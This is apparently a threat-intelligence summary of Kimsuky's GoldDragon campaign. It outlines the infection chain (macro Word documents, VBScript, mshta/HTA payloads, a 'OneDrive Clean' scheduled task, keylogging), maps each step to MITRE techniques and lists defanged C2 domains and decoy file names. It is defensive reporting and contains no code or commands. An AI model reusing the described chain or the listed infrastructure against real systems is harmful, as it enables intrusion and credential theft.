Kimsuky’s GoldDragon cluster is a multi-stage operation targeting Korea-related entities, evolving rapidly with new infection chains and a layered C2 network. The campaign starts with spear-phishing and uses HTML Application (HTA), VBScript, and mshta to fetch payloads, exfiltrate data, and establish persistence.
#Kimsuky #GoldDragon
#Kimsuky #GoldDragon
Keypoints
- Kimsuky’s GoldDragon cluster demonstrates a multi-stage infection chain beginning with spear-phishing and a macro-embedded Word document.
- Initial infection leads to VBScript delivery, with the actor abusing legitimate hosting services to host malicious scripts encoded for delivery.
- The campaign relies on HTML Application (HTA) and mshta.exe to execute fetched payloads, enabling staged execution.
- Multiple C2 stages are used, with IP validation and OS/user-agent checks to control payload delivery and target suitability.
- Persistence is achieved via a scheduled task named “OneDrive Clean,” downloaded via s.php and registered on the victim’s system.
- Decoy documents and geopolitically themed content are used to entice targets (politics, diplomacy, think tanks, etc.).
- Threat actors use obfuscation, encoded content, and legitimate hosting/blog services to hide infrastructure and reduce exposure.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document. “the actor initiated the infection chain sending a spear-phishing email containing a macro-embedded Word document.”
- [T1059.003] Windows Script – A Visual Basic Script was delivered to the victim. “a Visual Basic Script was delivered to the victim.”
- [T1218.002] Signed Binary Proxy Execution: Mshta – The macro executes a fetched payload with the mshta.exe process that is designed to execute a Microsoft HTML Application. “the macro executes a fetched payload with the mshta.exe process that is designed to execute a Microsoft HTML Application.”
- [T1218.005] HTA – HTML Application (HTA) payloads are used for reporting victim information and creating a scheduled task. “The HTA payload has two main goals: reporting the victim information to the C2 server and creating a scheduled task for auto-execution.”
- [T1105] Ingress Tool Transfer – The fetched script downloads an additional payload from the C2 infrastructure. “The fetched script downloads an additional payload and registers it…”
- [T1082] System Information Discovery – The HTA/VBS activities collect system information and send it to the C2. “The sent data contains the ProgramFiles folder path, antivirus name, recently opened file list, user name, OS name, OS version…”
- [T1056.001] Keylogging – Final payload can capture keystrokes and other sensitive data. “stored web browser login credentials” and related data exfiltration.
Indicators of Compromise
- [Domains] Malicious hosting domains – attach.42web[.]io, attachment.a0001[.]net, bigfile[.]totalh[.]net, clouds[.]rf[.]gd, global[.]onedriver[.]epizy[.]com, global.web1337[.]net
- [Domains] C2 and infrastructure domains – leehr36[.]mypressonline[.]com/h[.]php, leehr24[.]mywebcommunity[.]org/h[.]php, weworld59[.]myartsonline[.]com/h[.]php
- [Domains] Additional C2 or hosting domains – weworld78[.]atwebpages[.]com/info[.]php?ki87ujhy=, weworld78[.]atwebpages[.]com/s[.]php, weworld78[.]atwebpages[.]com/hta[.]php
- [Domains] Blogspot/blog URLs used for deception – 225b4d3c305f43e1a590[.]blogspot[.]com/2022/01/1.html, 3a8f846675194d779198[.]blogspot[.]com/2021/10/1.html
- [File Names] Delivered and decoy documents – CV.DHOM Alexandra Siddall (Korean).doc, 2022년AL(220412).doc, [양식]사례비지급의뢰서.doc
- [URLs] Redirect and tracking destinations – mail.google.com as a redirect target in error paths (as seen in the index/h.php flows)
Read more: https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/